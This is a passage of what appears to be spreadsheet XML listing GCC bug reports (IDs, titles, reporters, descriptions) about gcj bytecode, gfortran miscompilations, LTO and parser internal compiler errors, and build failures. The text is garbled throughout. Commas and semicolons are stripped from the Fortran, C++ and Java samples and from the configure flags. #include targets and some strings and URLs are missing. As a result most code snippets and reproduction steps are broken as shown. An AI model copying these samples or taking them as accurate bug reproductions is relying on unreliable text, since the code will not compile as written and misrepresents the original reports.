      realOutput.writeByte (TC_EXCEPTION)
      reset (true)
      try
      {
        writeObject (e)
      }
      catch (IOException ioe)
      {
        throw new StreamCorruptedException (Exception  + ioe +  thrown while 
exception was being written to stream.)
      }
      reset (true)
    }
    finally
    {
      isSerializing = was_serializing
      if (! was_serializing)
        setBlockDataMode (true)
    }
  }
  Resulting Byteocde with gcj -C:
   830 invokespecial #289 &lt;Method java.io.StreamCorruptedException(java.lang.Strin
g)&gt;
 833 athrow
 834 aload_0
 835 iconst_1
 836 invokespecial #269 
 839 jsr 850
 842 astore 4    &lt;---------------  THERE should be a GOTO
 844 jsr 850
 847 aload 4
 849 athrow
 850 astore_3
 851 aload_0
 852 iload_2
 853 putfield #90 
 856 iload_2
 857 ifne 865
 860 aload_0
 861 iconst_1
 862 invokespecial #65 
 865 ret 3
 867 return
  Resulting Bytecode with javac/jikes:
 831 invokespecial #88 &lt;Method java.io.StreamCorruptedException(java.lang.String
)&gt;
 834 athrow
 835 aload_0
 836 iconst_1
 837 invokespecial #79 
 840 jsr 854
 843 goto 872   &lt;------------------------
 846 astore 11
 848 jsr 854
 851 aload 11
 853 athrow
 854 astore 12
 856 aload_0
 857 iload_2
 858 putfield #16 
 861 iload_2
 862 ifne 870
 865 aload_0
 866 iconst_1
 867 invokespecial #1 
 870 ret 12
 872 return
&gt;
Release:
3.0 20010305 (prerelease)
Environment:
System: Linux femme 2.2.16-SMP #1 SMP Wed Sep 27 18:18:28 GMT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /project/gcc-3.0/configure --enable-languages=javac++c --prefix=/project/gcc-3.0-install --enable-threads=posix --srcdir=/project/gcc-3.0
How-To-Repeat:
	gcj -C ObjectOutputStream.java</t>
  </si>
  <si>
    <t>praun</t>
  </si>
  <si>
    <t>GCC-37099</t>
  </si>
  <si>
    <t>[4.3 4.4 regression] Wrong results when comparing a character array to a character expression</t>
  </si>
  <si>
    <t>When compiled with gfortran 4.3.1/4.4.0 the following code:
module xparams
  integerparameter :: exprbeg=100exprend=154
  character(*)dimension(exprbeg:exprend)parameter :: &amp;
      exprs=(/'nint()  ''log10() ''sqrt()  ''acos()  ''asin()  '   &amp;
      'atan()  ''cosh()  ''sinh()  ''tanh()  ''int()   '           &amp;
      'cos()   ''sin()   ''tan()   ''exp()   ''log()   ''abs()   '&amp;
      'delta() ''step()  ''rect()  ''max()  ''min()  ''bj0()   '&amp;
      'bj1()   ''bjn()  ''by0()   ''by1()   ''byn()  ''logb() '&amp;
      'erf()   ''erfc()  ''lgamma()''gamma() ''csch()  ''sech()  '&amp;
      'coth()  ''lif() ''gaus()  ''sinc()  ''atan2()''mod()  '&amp;
      'nthrt()''ramp()  ''fbi()   ''fbiq()  ''uran() ''aif()'&amp;
      'sgn()   ''cbrt()  ''fact()  ''somb()  ''bk0()   ''bk1()   '&amp;
      'bkn()  ''bbi() ''bbiq()'/)
  logical :: tmp(5526)
  character(26) :: al = 'abcdefghijklmnopqrstuvwxyz'
end
program pack_bug
  use xparams
    do i = 1 1
      tmp(:i) = (exprs(:)(1:1)==al(i:i))
      print '(55L)' exprs(:)(1:1)=='a'
      print '(55L)' tmp(:i)
    end do
end
gives
FFFTTTFFFFFFFFFTFFFFFFFFFFFFFFFFFFFFFFTFFFFFFTFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
The first line is the expected result the second one is wrong.
See http://gcc.gnu.org/ml/fortran/2008-08/msg00057.html for the original post.
the dump original gives:
pack_bug ()
{
  extern character(kind=1) al[1:26]
  integer(kind=4) i
  extern logical(kind=4) tmp[1430]
  static integer(kind=4) options.0[7] = {68 127 0 0 0 1 0}
  _gfortran_set_options (7 (void *) 
  i = 1
  if (i &lt;= 1)
    {
      while (1)
        {
          {
            logical(kind=4) D.1013
            {
              integer(kind=4) D.992
              static character(kind=1)[1:8] * A.1[55] = {
              D.992 = i
              {
                integer(kind=4) D.994
                integer(kind=4) S.2
                D.994 = D.992 * 55 + -56
                S.2 = 1
                while (1)
                  {
                    if (S.2 &gt; 55) goto L.3
                    tmp[S.2 + D.994] = _gfortran_compare_string (8 A.1[S.2 + -1] 1 (character(kind=1)[1:26] *) 
                    S.2 = S.2 + 1
                  }
                L.3:
              }
            }
            {
              struct __st_parameter_dt dt_parm.3
              dt_parm.3.common.filename = 
              dt_parm.3.common.line = 22
              dt_parm.3.format = 
              dt_parm.3.format_len = 5
              dt_parm.3.common.flags = 4096
              dt_parm.3.common.unit = 6
              _gfortran_st_write (
              {
                static logical(kind=4) A.4[55] = {0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0}
                {
                  integer(kind=4) S.5
                  S.5 = 0
                  while (1)
                    {
                      if (S.5 &gt; 54) goto L.4
                      {
                        logical(kind=4) D.999
                        D.999 = A.4[S.5]
                        _gfortran_transfer_logical (
                      }
                      S.5 = S.5 + 1
                    }
                  L.4:
                }
              }
              _gfortran_st_write_done (
            }
            {
              struct __st_parameter_dt dt_parm.6
              dt_parm.6.common.filename = 
              dt_parm.6.common.line = 23
              dt_parm.6.format = 
              dt_parm.6.format_len = 5
              dt_parm.6.common.flags = 4096
              dt_parm.6.common.unit = 6
              _gfortran_st_write (
              {
                struct array1_logical(kind=4) parm.7
                integer(kind=4) D.1002
                D.1002 = i
                parm.7.dtype = 273
                parm.7.dim[0].lbound = 1
                parm.7.dim[0].ubound = 55
                parm.7.dim[0].stride = 1
                parm.7.data = (void *) 
                parm.7.offset = -56
                _gfortran_transfer_array (
              }
              _gfortran_st_write_done (
            }
            L.1:
            D.1013 = i == 1
            i = i + 1
            if (D.1013) goto L.2
          }
        }
    }
  L.2:
}</t>
  </si>
  <si>
    <t>GCC-19060</t>
  </si>
  <si>
    <t>[4.0 Regression] Miscompiling of if and long long</t>
  </si>
  <si>
    <t>Program:
---8X---------------------------
#include
int main() {
  std::ofstream file(test.txt)
  std::streampos startpos = file.tellp()
  file &lt;&lt; 10 
  std::streampos endpos = file.tellp()
  assert(endpos != startpos)
  return 0
}
---X8---------------------------
compile at g++ 3.4.3 and work fine but fail after compile at g++ 4.0.0 
20041215 (mainline).
Also note: if set LD_LIBRARY_PATH point to gcc_34/lib (my gcc 3.4 lib 
directory) 
compiled with g++ 4.0 program work fine (using old gcc 3.4 shared libraries).
I think problem in code of libstdc++.so.6 or libgcc_s.so.1 
Vladimir</t>
  </si>
  <si>
    <t>GCC-60568</t>
  </si>
  <si>
    <t>lto1: internal compiler error: in insn_min_length at config/i386/i386.md:1599</t>
  </si>
  <si>
    <t>Created attachment 32383
Unreduced TEncSbac.ii gzipped
In member function '_ZThn8_N4x2658TEncSbacD0Ev':
lto1: error: unrecognizable insn:
(jump_insn 3 2 4 (set (pc)
        (mem:SI (plus:SI (unspec:SI [
                        (symbol_ref:SI (_ZN4x2658TEncSbacD0Ev) [flags 0x1] )
                    ] UNSPEC_GOT)
                (reg:SI 2 cx)) [0  S4 A8])) /var/tmp/portage/media-libs/x265-0.8/work/multicoreware-x265-527d03c56d68/source/Lib/TLibEncoder/TEncSbac.h:66 -1
     (nil))
lto1: internal compiler error: in insn_min_length at config/i386/i386.md:1599
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [/var/tmp/portage/media-libs/x265-0.8/temp/cc97nOMM.ltrans3.ltrans.o] Error 1
Called as:
/usr/bin/x86_64-pc-linux-gnu-g++  -m32 -fPIC -flto=4 -fuse-linker-plugin -O2 -ggdb -pipe -march=native -mtune=native -mno-3dnow -mno-sse4.2 -mno-avx  -Wl-Bsymbolic-znoexecstack  -flto=4 -fuse-linker-plugin -Wl--as-needed -Wl-O2 -Wl-flto -O2 -ggdb -pipe -march=native -mtune=native -mno-3dnow -mno-sse4.2 -mno-avx -shared -Wl-sonamelibx265.so.7 -o libx265.so.0.8 CMakeFiles/x265-shared.dir/dllmain.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/NALwrite.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/SEIwrite.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/SyntaxElementWriter.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/TEncBinCoderCABAC.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/TEncCu.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/TEncEntropy.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/TEncSampleAdaptiveOffset.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/TEncSbac.cpp.o encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/TEncSearch.cpp.o encoder/CMakeFiles/encoder.dir/bitcost.cpp.o encoder/CMakeFiles/encoder.dir/motion.cpp.o encoder/CMakeFiles/encoder.dir/slicetype.cpp.o encoder/CMakeFiles/encoder.dir/frameencoder.cpp.o encoder/CMakeFiles/encoder.dir/framefilter.cpp.o encoder/CMakeFiles/encoder.dir/cturow.cpp.o encoder/CMakeFiles/encoder.dir/dpb.cpp.o encoder/CMakeFiles/encoder.dir/ratecontrol.cpp.o encoder/CMakeFiles/encoder.dir/compress.cpp.o encoder/CMakeFiles/encoder.dir/reference.cpp.o encoder/CMakeFiles/encoder.dir/encoder.cpp.o encoder/CMakeFiles/encoder.dir/api.cpp.o encoder/CMakeFiles/encoder.dir/weightPrediction.cpp.o common/CMakeFiles/common.dir/x86/pixel-a.asm.o common/CMakeFiles/common.dir/x86/const-a.asm.o common/CMakeFiles/common.dir/x86/cpu-a.asm.o common/CMakeFiles/common.dir/x86/ssd-a.asm.o common/CMakeFiles/common.dir/x86/mc-a.asm.o common/CMakeFiles/common.dir/x86/mc-a2.asm.o common/CMakeFiles/common.dir/x86/pixel-util8.asm.o common/CMakeFiles/common.dir/x86/blockcopy8.asm.o common/CMakeFiles/common.dir/x86/pixeladd8.asm.o common/CMakeFiles/common.dir/x86/dct8.asm.o common/CMakeFiles/common.dir/x86/sad16-a.asm.o common/CMakeFiles/common.dir/x86/intrapred16.asm.o common/CMakeFiles/common.dir/x86/ipfilter16.asm.o common/CMakeFiles/common.dir/x86/pixel-32.asm.o common/CMakeFiles/common.dir/x86/asm-primitives.cpp.o common/CMakeFiles/common.dir/vec/vec-primitives.cpp.o common/CMakeFiles/common.dir/vec/dct-sse3.cpp.o common/CMakeFiles/common.dir/vec/blockcopy-sse3.cpp.o common/CMakeFiles/common.dir/vec/dct-ssse3.cpp.o common/CMakeFiles/common.dir/vec/dct-sse41.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComBitStream.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComDataCU.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComLoopFilter.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComMotionInfo.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComPattern.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComPic.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComPicSym.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComPicYuv.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComPicYuvMD5.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComPrediction.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComRom.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComSampleAdaptiveOffset.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComSlice.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComTrQuant.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComWeightPrediction.cpp.o common/CMakeFiles/common.dir/__/Lib/TLibCommon/TComYuv.cpp.o common/CMakeFiles/common.dir/primitives.cpp.o common/CMakeFiles/common.dir/pixel.cpp.o common/CMakeFiles/common.dir/dct.cpp.o common/CMakeFiles/common.dir/ipfilter.cpp.o common/CMakeFiles/common.dir/intrapred.cpp.o common/CMakeFiles/common.dir/cpu.cpp.o common/CMakeFiles/common.dir/version.cpp.o common/CMakeFiles/common.dir/threading.cpp.o common/CMakeFiles/common.dir/threadpool.cpp.o common/CMakeFiles/common.dir/wavefront.cpp.o common/CMakeFiles/common.dir/md5.cpp.o common/CMakeFiles/common.dir/TShortYUV.cpp.o common/CMakeFiles/common.dir/common.cpp.o common/CMakeFiles/common.dir/param.cpp.o common/CMakeFiles/common.dir/lowres.cpp.o common/CMakeFiles/common.dir/piclist.cpp.o -lpthread -lrt
find . -type f -name *.o -exec grep _ZThn8_N4x2658TEncSbacD0Ev {} \
Binary file ./encoder/CMakeFiles/encoder.dir/__/Lib/TLibEncoder/TEncSbac.cpp.o matches
Going to attach TEncSbac.ii.gz.
gcc -v
Using built-in specs.
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.9.0-alpha20140317/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.9.0-alpha20140317/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.9.0_alpha20140317/work/gcc-4.9-20140317/configure --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.9.0-alpha20140317 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.0-alpha20140317/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.9.0-alpha20140317 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.9.0-alpha20140317/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.9.0-alpha20140317/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.0-alpha20140317/include/g++-v4 --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.9.0-alpha20140317/python --enable-languages=cc++javagoobjcobj-c++fortranada --enable-obsolete --disable-werror --with-system-zlib --enable-nls --without-included-gettext --enable-checking=release --with-bugurl=https://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.9.0_alpha20140317' --enable-libstdcxx-time --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-multilib --disable-altivec --disable-fixed-point --enable-targets=all --enable-java-awt=gtk --enable-libgomp --enable-lto --with-cloog --disable-isl-version-check
Thread model: posix
gcc version 4.9.0-alpha20140317 20140318 (experimental) [trunk revision 208641] (Gentoo 4.9.0_alpha20140317)</t>
  </si>
  <si>
    <t>nheghathivhistha</t>
  </si>
  <si>
    <t>GCC-56646</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] ICE: in cp_parser_late_return_type_opt at cp/parser.c:16970</t>
  </si>
  <si>
    <t>Created attachment 29686
Preprocessed source
Return type resolution fails for functions inside a struct declared inside other class Methods.
Tested on both g++4.7 (Debian 4.7.2-4) and g++ Snapshot (4.8.0 20130316)
$ /usr/lib/gcc-snapshot/bin/g++ -v -save-temps -Wall -Wextra -std=gnu++0x abc.cc 
Using built-in specs.
COLLECT_GCC=/usr/lib/gcc-snapshot/bin/g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 20130316-1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --enable-shared --enable-linker-build-id --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-snap-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-snap-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-snap-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64 --with-tune=generic --disable-werror --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.0 20130316 (experimental) [trunk revision 196694] (Debian 20130316-1) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=gnu++11' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.8.0/cc1plus -E -quiet -v -imultilib . -imultiarch x86_64-linux-gnu -D_GNU_SOURCE abc.cc -mtune=generic -march=x86-64 -std=gnu++11 -Wall -Wextra -fpch-preprocess -o abc.ii
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.8.0/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.8.0/../../../../include/c++/4.8.0
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.8.0/../../../../include/c++/4.8.0/x86_64-linux-gnu/.
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.8.0/../../../../include/c++/4.8.0/backward
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.8.0/include
 /usr/local/include
 /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.8.0/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=gnu++11' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.8.0/cc1plus -fpreprocessed abc.ii -quiet -dumpbase abc.cc -mtune=generic -march=x86-64 -auxbase abc -Wall -Wextra -std=gnu++11 -version -o abc.s
GNU C++ (Debian 20130316-1) version 4.8.0 20130316 (experimental) [trunk revision 196694] (x86_64-linux-gnu)
	compiled by GNU C version 4.8.0 20130316 (experimental) [trunk revision 196694] GMP version 5.0.5 MPFR version 3.1.1-p2 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (Debian 20130316-1) version 4.8.0 20130316 (experimental) [trunk revision 196694] (x86_64-linux-gnu)
	compiled by GNU C version 4.8.0 20130316 (experimental) [trunk revision 196694] GMP version 5.0.5 MPFR version 3.1.1-p2 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 179a73a5a5f01088a1db5a487424c1fe
abc.cc: In member function 'void Foo::Func()':
abc.cc:23:16: internal compiler error: in cp_parser_late_return_type_opt at cp/parser.c:16970
     auto Bar() -&gt; int {
                ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc1Bz05T.out file please attach this to your bugreport.
-------------------------------------------------------
Source Code:
-------------------------------------------------------
void Func() {
  struct StructDeclaredInsideFunc {
    // This is OK.
    auto Bar() -&gt; int {
      return 1
    }
  }
}
class Foo {
  public:
  void Func()
}
void Foo::Func() {
  struct StructDeclaredInsideClassFunc {
    // Causes:
    // g++4.7 (Debian 4.7.2-4): internal compiler error: in cp_parser_late_return_type_opt at
    // cp/parser.c:16698
    // g++ Snapshot (4.8.0 20130316): internal compiler error: in cp_parser_late_return_type_opt at
    // cp/parser.c:16970
    auto Bar() -&gt; int {
      return 1
    }
  }
}
-------------------------------------------------------</t>
  </si>
  <si>
    <t>pramodg</t>
  </si>
  <si>
    <t>GCC-46905</t>
  </si>
  <si>
    <t>-flto -fno-lto does not disable lto</t>
  </si>
  <si>
    <t>gcc -flto -fno-lto hello.c generates LTO objects. It should not.
In large makefiles it's often convenient to use -fno... to disable
something for only specific files.</t>
  </si>
  <si>
    <t>GCC-31265</t>
  </si>
  <si>
    <t>Rejects valid with -std=f95: Error with RESHAPE on REAL initialization</t>
  </si>
  <si>
    <t>With std f95 or f2003 reshape is not allowed in real arrays but it is in integer ones or with std legacy or gnu.
It seems the standard should actually allow this construct (see http://gcc.gnu.org/ml/fortran/2007-02/msg00001.html) so here is a bug report (I didn't anything similar).
$cat test.f90
PROGRAM test
  IMPLICIT NONE
  INTEGER DIMENSION(33) PARAMETER :: &amp;
    Aij=RESHAPE((/ 133 &amp;
                   322 &amp;
                   322 /) (/33/))
  REAL DIMENSION(33) PARAMETER :: &amp;
    Bij=RESHAPE((/ 1.0D03.0D03.0D0 &amp;
                   3.0D02.0D02.0D0 &amp;
                   3.0D02.0D02.0D0 /) (/33/))
END PROGRAM test
$gfortran -std=f95 -c test.f90
test.f90:9.8:
    Bij=RESHAPE((/ 1.0D03.0D03.0D0 &amp;
       1
Error: Extension: Evaluation of nonstandard initialization expression at (1)</t>
  </si>
  <si>
    <t>jellby</t>
  </si>
  <si>
    <t>GCC-10119</t>
  </si>
  <si>
    <t>[3.4 regression] tree-checking ICE in dump_expr</t>
  </si>
  <si>
    <t>The address of a template member function cannot be used at compile time.  The attached file output:
amftp.cpp:12: sorry not implemented: `component_ref' not supported by
   dump_decl
amftp.cpp:12: sorry not implemented: `component_ref' not supported by
   dump_decl
Release:
3.0.4
Environment:
Debian GNU / Linux</t>
  </si>
  <si>
    <t>GCC-38439</t>
  </si>
  <si>
    <t>I/O PD edit descriptor inconsistency</t>
  </si>
  <si>
    <t>Found at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/2fc107eda65d9065
The following code
      WRITE (*'(1PD24.15E4)') 1.0d0
      end
is rejected in gfortran 4.2 to 4.4 with:
  Error: Period required in format specifier at (1)
(and ifort NAG f95 and g95 also reject it).
It is accepted with openf95 sunf95 and gfortran 4.1 [the latter with a warning matching the error message above] and it is said to be accepted with g77.
The compiled programs then prints:
 1.000000000000000D+0000  (note the D)
Using the run-time version of the format string i.e.
      character(len=25) :: str
      str = '(1PD24.15E4)'
      WRITE (*str) 1.0d0
      end
it works with gfortran (4.1 to 4.4) and with g95.
The PD edit descriptor was always invalid according to the Fortran standard using '(1PE24.15E4)' works with all compilers and is valid (but it prints ...E+0000 not D).
The question is now whether
a) One accepts it with e.g. -std=legacy. (The error message should then point to the -std=legacy option)
-- or --
b) One checks whether on can get rid of the D support in libgfortran to save some microseconds libgfortran should then also print a run-time error message.</t>
  </si>
  <si>
    <t>GCC-28239</t>
  </si>
  <si>
    <t>[4.2 regression] ICE in gimple_add_tmp_var at gimplify.c:720</t>
  </si>
  <si>
    <t>I get the following ICE with gcc 4.2 on invalid code:
(sid)5059:tbm@test: ~/delta/bin] /usr/lib/gcc-snapshot/bin/g++ -c mini.c
mini.c:1: error: 'SelectedStyle' has not been declared
mini.c: In function 'int SelectedStyle(bool)':
mini.c:1: error: only constructors take base initializers
mini.c:1: error: '_' was not declared in this scope
mini.c:2: error: '_sw_group' was not declared in this scope
mini.c:4: error: expected `)' at end of input
mini.c:4: error: expected `{' at end of input
mini.c:4: internal compiler error: in gimple_add_tmp_var at gimplify.c:694
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
zsh: exit 1     /usr/lib/gcc-snapshot/bin/g++ -c mini.c
(sid)5060:tbm@test: ~/delta/bin] more mini.c
SelectedStyle::SelectedStyle (bool layout):_desktop (__null) _table (2 6) _fill_label (_(F:))
_popup_mm (_sw_group) _sw_unit (__null) _tooltips () _drop ((void *[])
                                                               {
                                                               0 0}</t>
  </si>
  <si>
    <t>GCC-23078</t>
  </si>
  <si>
    <t>[4.0 regression] m68k ICE</t>
  </si>
  <si>
    <t>g++ -O3 -Iboxes -Ierrors -Ievaluate -Igenerator -Iparser -Ipropagate -Isignals
-Itlib -Idraw    -c -o boxes/boxtype.o boxes/boxtype.cpp
boxes/boxtype.cpp: In function 'void getBoxType(CTree* int* int*)':
boxes/boxtype.cpp:74: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
make[2]: *** [boxes/boxtype.o] Error 1</t>
  </si>
  <si>
    <t>GCC-40958</t>
  </si>
  <si>
    <t>module files too large</t>
  </si>
  <si>
    <t>I notice that the module files gfortran generates are really large and believe that this could maybe be improved easily which would reduce disk usage and presumably improve compile time.
The observation is that a compilation of CP2K generates 130Mb of .mod files for 27Mb sources. Doing a 'cat *.mod &gt; modall' and using that file for analysis I find that 'bzip2 modall' -&gt; 6Mb file so 20-fold compression. Compile time seems to also have a large factor of system time which is presumably disk access. With a single process on a fast RAID disk I get the following time:
&gt; gfortran -c -fsyntax-only -ftime-report CP2K_2009-05-01.f90
Execution times (seconds)
 garbage collection    :   8.20 ( 7%) usr   0.34 ( 1%) sys   9.33 ( 4%) wall       0 kB ( 0%) ggc
 callgraph construction:   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
 rebuild jump labels   :   1.13 ( 1%) usr   0.11 ( 0%) sys   1.32 ( 1%) wall       7 kB ( 0%) ggc
 parser                :  80.34 (64%) usr  27.25 (88%) sys 157.87 (74%) wall 1272352 kB (34%) ggc
 inline heuristics     :   4.58 ( 4%) usr   0.42 ( 1%) sys   5.63 ( 3%) wall      38 kB ( 0%) ggc
 tree gimplify         :   7.69 ( 6%) usr   0.71 ( 2%) sys   9.73 ( 5%) wall  724206 kB (19%) ggc
 tree eh               :   0.27 ( 0%) usr   0.00 ( 0%) sys   0.42 ( 0%) wall       0 kB ( 0%) ggc
 tree CFG construction :   1.55 ( 1%) usr   0.18 ( 1%) sys   2.05 ( 1%) wall  388675 kB (10%) ggc
 tree CFG cleanup      :   0.46 ( 0%) usr   0.03 ( 0%) sys   0.53 ( 0%) wall    1901 kB ( 0%) ggc
 dominance computation :   0.25 ( 0%) usr   0.03 ( 0%) sys   0.42 ( 0%) wall       0 kB ( 0%) ggc
 expand                :  19.47 (16%) usr   1.82 ( 6%) sys  24.43 (11%) wall 1348665 kB (36%) ggc
 varconst              :   0.02 ( 0%) usr   0.01 ( 0%) sys   0.06 ( 0%) wall     263 kB ( 0%) ggc
 final                 :   0.16 ( 0%) usr   0.02 ( 0%) sys   0.16 ( 0%) wall       0 kB ( 0%) ggc
 symout                :   0.03 ( 0%) usr   0.02 ( 0%) sys   0.05 ( 0%) wall      32 kB ( 0%) ggc
 TOTAL                 : 124.67            31.08           212.75            3736334 kB
so a relatively large fraction of compile time is system time in the parser (cpu usage during compilation is also rather far from 100%). Presumably a parallel compile would be even more impacted.
While I don't have a good general solution a nearly 50% improvement in mod file size can be easily obtained by by-hand compression:
cat modall | sed s/UNKNOWN/U/g | sed s/INTEGER/I/g | sed s/VARIABLE/V/g |  sed s/PROCEDURE/P/g | sed s/DERIVED/D/g | sed s/CHARACTER/C/g | sed s/SUBROUTINE/S/g | sed s/FUNCTION/F/g | sed s/ASSUMED_SHAPE/AS/g | sed s/REAL/R/g | sed s/CONSTANT/CST/g | sed s/DIMENSION/M/g | sed s/DUMMY/Y/g | sed s/LOGICAL/L/g | sed s/EXPLICIT/X/g | sed s/INTENT/T/g | sed s/ACCESS/XS/g | sed s/POINTER/PT/g | sed s/DEFERRED/FR/g &gt; modall.new
yields a 75Mb file (so roughly half of the original). Presumably that would reduce the time needed to read the mod files by half and might be faster to parse. The down-side is that the module files are somewhat harder human-readable but that can't be their primary purpose. Looking at module.c such a change would be relatively easy to implement.</t>
  </si>
  <si>
    <t>GCC-44899</t>
  </si>
  <si>
    <t>--with-build-config=bootstrap-lto fails</t>
  </si>
  <si>
    <t>--with-build-config=bootstrap-lto ...  make -j8 fails here in the second stage
with several configure errors in multiple subdirs (zlib lto-plugin)</t>
  </si>
  <si>
    <t>GCC-2318</t>
  </si>
  <si>
    <t>gcc 2.95.3 build ('make boostrap') fails on Tru64 5.1</t>
  </si>
  <si>
    <t>I've configured gcc:
../gcc-20010305/configure --enable-shared --enable-threads --prefix=/usr/local1/DEC/packages/gcc-2.95.3
in an empty directory and then I've done 'make boostrap'
and the compilation finally fails on (apparently) some assembly code:
./xgcc -B./ -B/usr/local1/DEC/packages/gcc-2.95.3/alphaev67-dec-osf5.1/bin/ -isystem /usr/local1/DEC/packages/gcc-2.95.3/alphaev67-dec-osf5.1/include -O2   -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc-20010305/gcc -I../../gcc-20010305/gcc/. -I../../gcc-20010305/gcc/config -I../../gcc-20010305/gcc/../include -DUSE_COLLECT2 -DL_clz -c ../../gcc-20010305/gcc/libgcc2.c -o libgcc/./_clz.o
mips-tfile /tmp/cco9BNo9.s:8 Invalid .stabs/.stabn directive value not found
line:    #.stabs        /usr/local1/src/build/gcc-obj/gcc/10000$Ltext0
mips-tfile /tmp/cco9BNo9.s:9 Invalid .stabs/.stabn directive value not found
